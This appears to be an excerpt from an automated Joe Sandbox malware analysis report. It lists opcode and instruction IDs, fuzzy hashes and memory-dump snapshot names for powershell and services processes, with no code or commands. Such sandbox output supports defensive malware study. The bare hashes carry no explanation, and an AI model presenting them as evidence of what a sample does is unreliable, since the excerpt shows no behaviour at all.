                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a7fb07c345f3837613cfc5ef6d1b8d8bbbc988837bb969118c786a0effeba180
                                                                                                      • Instruction ID: f08b3420c32a2bf01ae7a8e5a095fce77a7d3666c22fcf2411ba0e1f16c71182
                                                                                                      • Opcode Fuzzy Hash: a7fb07c345f3837613cfc5ef6d1b8d8bbbc988837bb969118c786a0effeba180
                                                                                                      • Instruction Fuzzy Hash: 4741277140EBC84FE7569B3898559523FF0EF53320B1A06EFD088CB5B3D665A846C792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
                                                                                                      • Instruction ID: 1fc59d137c7162e66c24fefc1138fe2fe91901e5beb853c5e3a7089b1ec489ad
                                                                                                      • Opcode Fuzzy Hash: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
                                                                                                      • Instruction Fuzzy Hash: AA21F83190C74C4FDB59DF9C984A7E97FE0EB96321F04416BD048C3156DA74945ACB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3255569514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bcf4a256106f3ed77f2f0f4437679d8e3887d0beaa3ed2a55cb5bdc172ca55f0
                                                                                                      • Instruction ID: 3ee01aa1ee4f249140ad01f0d4fefc00b610b1a53fe11b21888b6c71c9dc1ccf
                                                                                                      • Opcode Fuzzy Hash: bcf4a256106f3ed77f2f0f4437679d8e3887d0beaa3ed2a55cb5bdc172ca55f0
                                                                                                      • Instruction Fuzzy Hash: 9DF0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC41C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5b22c87fda121f4224ec020b6714e9a505c52030f796a912bf66c3c9b1899567
                                                                                                      • Instruction ID: f1e379c35b759b49d4585623247d704a31df64305c80a1af140877baf23d6d7a
                                                                                                      • Opcode Fuzzy Hash: 5b22c87fda121f4224ec020b6714e9a505c52030f796a912bf66c3c9b1899567
                                                                                                      • Instruction Fuzzy Hash: 75F0BE32B0E5498FD765EB9CE0619A873E0EF0532070600BAE05DCB1B3CA26AC40C750
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000016.00000002.3267420083.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b960000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                                                      Memory Dump Source
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3dbf6d9ca80413403d34f4a434ba13af8a81be109c3f75dae46cfa5da0acb8b0
                                                                                                      • Instruction ID: 9b8d3f8eea829dc58c7be66b50e86e6dc84428a631ac9ae56432598d370a193c
                                                                                                      • Opcode Fuzzy Hash: 3dbf6d9ca80413403d34f4a434ba13af8a81be109c3f75dae46cfa5da0acb8b0
                                                                                                      • Instruction Fuzzy Hash: 66A1F6B0A28A9D8FD798DBA8D8657A97FE1FF59700F4001BAD049D72E6CB781801CB41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c9$!k9$"s9
                                                                                                      • API String ID: 0-3426396564
                                                                                                      • Opcode ID: 1362ab46e735cd035845962a2a6e1d6fab9c5b456af91076706fbaa2f21062da
                                                                                                      • Instruction ID: ec2170175067d79a8758d4bb305256bea5cf699cf96c0440a089e2801bbb0d0d
                                                                                                      • Opcode Fuzzy Hash: 1362ab46e735cd035845962a2a6e1d6fab9c5b456af91076706fbaa2f21062da
                                                                                                      • Instruction Fuzzy Hash: 4721CF36B2864E8FCB45EF6CE8415E977A0FB99369F15017BE809C3261D330A526CBC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 3308cde31ef4d6de54b64582d313fdeb7604eb99509ed6445aea93a37d142dae
                                                                                                      • Instruction ID: 1cbc0a30a7a77b9c7bf69d6b559153ad2efb776b704b0471cdae39169af0dd96
                                                                                                      • Opcode Fuzzy Hash: 3308cde31ef4d6de54b64582d313fdeb7604eb99509ed6445aea93a37d142dae
                                                                                                      • Instruction Fuzzy Hash: 9C21EA70E1652E8EEBB4EB68C8587E9B2B0FF18301F1041F9D40DA6291DB785AC4CF41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08ffce1df1fe210c24f208234249da710978bd7d779c64e1ca7dbf4cfded5177
                                                                                                      • Instruction ID: ee3b77cd819de5dd24323959b9704cbcc8368751bf1c6d384b81da3ac77d4ab1
                                                                                                      • Opcode Fuzzy Hash: 08ffce1df1fe210c24f208234249da710978bd7d779c64e1ca7dbf4cfded5177
                                                                                                      • Instruction Fuzzy Hash: 59513862B0813A8AD71A7BBCB8259FD7B50EF4536CB0846B7E05D870D7DD68A08297C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79a935ce678145e305d8e7cb95a9e5a737b2c042c804f3dedd4eb541c98bc170
                                                                                                      • Instruction ID: c074ab3c342adb133546298287ae7ad870d3674798ba46c6248c0a610c4ec9a6
                                                                                                      • Opcode Fuzzy Hash: 79a935ce678145e305d8e7cb95a9e5a737b2c042c804f3dedd4eb541c98bc170
                                                                                                      • Instruction Fuzzy Hash: 4D517F71A1895D8FDB59FBA8E4A5AECB7A0FF48314F00017BD009D71A6DE34A4418781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 242ad318d1651992fb43f550420b1120500e9b897285ff105024508976d3a20d
                                                                                                      • Instruction ID: 7b1840899f9cba0deb06aa85631b3bc87e5274cd9358e61a39e07113728a7475
                                                                                                      • Opcode Fuzzy Hash: 242ad318d1651992fb43f550420b1120500e9b897285ff105024508976d3a20d
                                                                                                      • Instruction Fuzzy Hash: C851B070A0891E9FCF54EF98D894AED7BF1FF58315F05016AE419E72A1DA34E981CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6123e713238d2570ec465d092825dd580f4742103f1331d23ac74e70f5a2ed1
                                                                                                      • Instruction ID: 1b106469faf8de14a452992f36baf24b8328073c5d0a399d3a93c4b6a414c3e2
                                                                                                      • Opcode Fuzzy Hash: c6123e713238d2570ec465d092825dd580f4742103f1331d23ac74e70f5a2ed1
                                                                                                      • Instruction Fuzzy Hash: 8651BC74E1952D8EDBA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DF386A84CF41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef4855ce17af6a8a2df1de8f35e598f1f5624df4b8f7c34d43ae94f5b52f4ffd
                                                                                                      • Instruction ID: 513153c1cab70c2912595dcca723cd1b42af79763bf28d25e0910d5c994cdde1
                                                                                                      • Opcode Fuzzy Hash: ef4855ce17af6a8a2df1de8f35e598f1f5624df4b8f7c34d43ae94f5b52f4ffd
                                                                                                      • Instruction Fuzzy Hash: AF416F70A14A5D8FEB94EFA8D495AEDBBF1FF58344F00016AD409E7295DB34A841CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e9fdca817729992dd094e01fdaa31bc698fd8d61b97a14f560f793a1e847b12f
                                                                                                      • Instruction ID: 3dba2e68ae36a56c02259112eec202fd9a84384399fe45ece9a43f3fc4efbb62
                                                                                                      • Opcode Fuzzy Hash: e9fdca817729992dd094e01fdaa31bc698fd8d61b97a14f560f793a1e847b12f
                                                                                                      • Instruction Fuzzy Hash: FC51EC34E1996D8EEBB4DB64CC647E9B3B5EB48301F1542F5D00DA2291DF356AC58F80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c897ee4217f11074f415e524c3fc7731f10347df1419d46eb077e3816a563b31
                                                                                                      • Instruction ID: 8f3ecfe66bcfd110940dba257c3c4d7d5c78e413f8656cc02400873421427409
                                                                                                      • Opcode Fuzzy Hash: c897ee4217f11074f415e524c3fc7731f10347df1419d46eb077e3816a563b31
                                                                                                      • Instruction Fuzzy Hash: DA41CD70E1552D8EEBA4DF25C8A9BE8B3B1EB58305F0542E9D04DA72A1DF346AC5CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 20cc32ece13de63203ede6f9e18df3da6885a0993375557de82024330bc389f8
                                                                                                      • Instruction ID: 3a02d9aa6f60225995aaf4f453e8e2a8e7747ba6f73987135b4c35a40664b863
                                                                                                      • Opcode Fuzzy Hash: 20cc32ece13de63203ede6f9e18df3da6885a0993375557de82024330bc389f8
                                                                                                      • Instruction Fuzzy Hash: 6E21F736B0E29D8EE71297B9DC211ED7B60EF46311F0545B3C044DB1E2D638260ACBD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75edd9be219b34e7f12ddd7a724a600cb2cecc9d57a470424baacdb8fb41378a
                                                                                                      • Instruction ID: f11fad92d67bef529c6cabbb68d4c024a0239f07888c3787a78c428000246aa8
                                                                                                      • Opcode Fuzzy Hash: 75edd9be219b34e7f12ddd7a724a600cb2cecc9d57a470424baacdb8fb41378a
                                                                                                      • Instruction Fuzzy Hash: A3319C31E1892C9FDBA4DF14C895AE973F1FB69301F5041EA900EE3265DE75AA80CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bdc7e26a3eb7286384c790b3cd6f365e686fb63dadddc320e7e6839a763a55f3
                                                                                                      • Instruction ID: 51789535502ed394d7b08ce83aea820a67d21609cf5f27e7ba9a3f1467f2fd79
                                                                                                      • Opcode Fuzzy Hash: bdc7e26a3eb7286384c790b3cd6f365e686fb63dadddc320e7e6839a763a55f3
                                                                                                      • Instruction Fuzzy Hash: 9931BB31E0892C9FCF94DF14C895AE973F0FB69301F5011DA900EE3265DA75AA84CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 469dbeb7656e77e4757d1335b4d60460afaab5d7e5843d0bb12bcb9b3648f269
                                                                                                      • Instruction ID: 673a009a13592ce3648cccdb7222e15078e74c8847f4c5bbf69d1599ef1b028e
                                                                                                      • Opcode Fuzzy Hash: 469dbeb7656e77e4757d1335b4d60460afaab5d7e5843d0bb12bcb9b3648f269
                                                                                                      • Instruction Fuzzy Hash: 7131B974D1952D8EFBB4DF65C8A4BE9B7B1AB58301F1042E9D00DA22A1DF786AC5CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c75fff72a2c25ab68619075bc39d74c1c97d054aaa31c29e71578979afcfef57
                                                                                                      • Instruction ID: 47ecd03bdef93c35e296d5bc0160c26bb3a713ea43e35cd25c643cdef77ceb81
                                                                                                      • Opcode Fuzzy Hash: c75fff72a2c25ab68619075bc39d74c1c97d054aaa31c29e71578979afcfef57
                                                                                                      • Instruction Fuzzy Hash: 0131EE74E1962D8EEB64DF25CCA4BE9B3B1EB58301F0542F9D00D962A1DF356AC58F40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e69b41229905ee3a50480d1d4fcf382568438f13e336d71d49ee2faf32be7afc
                                                                                                      • Instruction ID: 94050386750499588c1cd16cd44777eb1000a622353b4047f651e9160f7c1023
                                                                                                      • Opcode Fuzzy Hash: e69b41229905ee3a50480d1d4fcf382568438f13e336d71d49ee2faf32be7afc
                                                                                                      • Instruction Fuzzy Hash: 02416F30A18A5D9FEB94EFA8C455AEDBBF1FF58355F00017AD409E7295DB346841CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 542caecde6c6d5471e9c7b50b78b90ce1eb663ef061886f8323467fa9288d8f4
                                                                                                      • Instruction ID: 57c2e1db5ee60034d794060a9cb47fcdf51fb9543f58524c4bbc464cd37ea2a0
                                                                                                      • Opcode Fuzzy Hash: 542caecde6c6d5471e9c7b50b78b90ce1eb663ef061886f8323467fa9288d8f4
                                                                                                      • Instruction Fuzzy Hash: DA51F734E0A96D8FEBB4DB58CC946E9B3B1EB58301F5542F5D01DA22A1DF396AC48F40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a3d00abac36bf1826315e2fff28ca4e2cf56b8aa3293ea60b74a65e44f58017
                                                                                                      • Instruction ID: 0c2acf294a5b48935dead19197ef01c463629d5fe1cbf39c7a3ab01be7d45ac5
                                                                                                      • Opcode Fuzzy Hash: 7a3d00abac36bf1826315e2fff28ca4e2cf56b8aa3293ea60b74a65e44f58017
                                                                                                      • Instruction Fuzzy Hash: E5214F36B0EA8D8FE7229BA8DC211ED7B71EF86711F0545B3C164DB1E2D638260AC751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 911ef85b501917fd1c6881335c3ac2d35107a6c3139449ef689d275a93f8bbe8
                                                                                                      • Instruction ID: bb5691b9f6a19964abeca47cdaa18beb8e797e6e49ba5410be0ff898b389f969
                                                                                                      • Opcode Fuzzy Hash: 911ef85b501917fd1c6881335c3ac2d35107a6c3139449ef689d275a93f8bbe8
                                                                                                      • Instruction Fuzzy Hash: CB319A31E0891C9FDBA4DF14C895AE973F1FB69301F5041EA900EE32A5DA75AA80CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d586c622fcbd26347bcb6e5f94df3eca7f917aadee6e61dea0876fd23a210d6
                                                                                                      • Instruction ID: e66dcee17f2d65f17ca4ac76a35641627b535ca16c89753912bae953e96edab9
                                                                                                      • Opcode Fuzzy Hash: 8d586c622fcbd26347bcb6e5f94df3eca7f917aadee6e61dea0876fd23a210d6
                                                                                                      • Instruction Fuzzy Hash: 9931BB31E0891C9FCF94DF14C895AE973F0FB69301F5011EA900EE3265CA75AA84CF42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3b2c5e0bd4f311ac1b7d9fc9c00f35b2ff6978a3667967a88cbeada8e312352
                                                                                                      • Instruction ID: 882ea7e3bb2baf7a93f76b77deb0791102c139dcd47fb9909209ee15c15bc199
                                                                                                      • Opcode Fuzzy Hash: e3b2c5e0bd4f311ac1b7d9fc9c00f35b2ff6978a3667967a88cbeada8e312352
                                                                                                      • Instruction Fuzzy Hash: D9319574D5992D8FFBA4DB54C894BE9B3B1AF58301F5042E9D01DA62A1DF786AC4CF00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a72375df8f097151e488705029577c0aa7706751e25b8edbef70c6fe648d51da
                                                                                                      • Instruction ID: 04062250d7f7ba50711ee603c224e4f90628b5276eef1c247e310ccff8ce4675
                                                                                                      • Opcode Fuzzy Hash: a72375df8f097151e488705029577c0aa7706751e25b8edbef70c6fe648d51da
                                                                                                      • Instruction Fuzzy Hash: FC31C974E19A1D8FEB64DF14CC98BE8B3B1AB58301F4542E5D01D972A1DF346AC58F00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d25f97215ff27c4e05de1e7b74202e8ec7165a8df14f41181686ce193f5ca186
                                                                                                      • Instruction ID: 42d337e5ff08655db50009f75631f9f97785db2edc46b3e61d3c1110cc7502be
                                                                                                      • Opcode Fuzzy Hash: d25f97215ff27c4e05de1e7b74202e8ec7165a8df14f41181686ce193f5ca186
                                                                                                      • Instruction Fuzzy Hash: 3F113835B1EA8E8FE7129F68CC212E97771EF86710F064573C060DB1E2DA38260A8791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2fbbfdec48ffa5cd07df0f6a7a36889a80a59a22569b2f224ea4d56fddebf1ce
                                                                                                      • Instruction ID: ade94aabd71d86a7e39d6c3de2023b30fde20e6686bb971aa4b745a23ed6e490
                                                                                                      • Opcode Fuzzy Hash: 2fbbfdec48ffa5cd07df0f6a7a36889a80a59a22569b2f224ea4d56fddebf1ce
                                                                                                      • Instruction Fuzzy Hash: 4E110635E1EA9E8FE7129F64CC212E97B71EF46710F0645B3C061DB1E2CA386609C791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 45174153ba568568e1a2ad49531db7c599daa20e11b94041945d56fe6e5957f0
                                                                                                      • Instruction ID: a0ca769d4f22e7478f1b6f4837c47f51996a7bcb9f7cb3d4cfd0310ef74404f1
                                                                                                      • Opcode Fuzzy Hash: 45174153ba568568e1a2ad49531db7c599daa20e11b94041945d56fe6e5957f0
                                                                                                      • Instruction Fuzzy Hash: 53118835A1864ECFDF44EF28C841AE97BA0FB58359F1501AAE849D3261C730A965CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c4f5994b172ab1db723f1c8eb688de1477a3c12c77f08869067558d45011bf10
                                                                                                      • Instruction ID: b52885abce043745989a6b9127e06d4817ab884dcd761fe354d876d5ff3a79d5
                                                                                                      • Opcode Fuzzy Hash: c4f5994b172ab1db723f1c8eb688de1477a3c12c77f08869067558d45011bf10
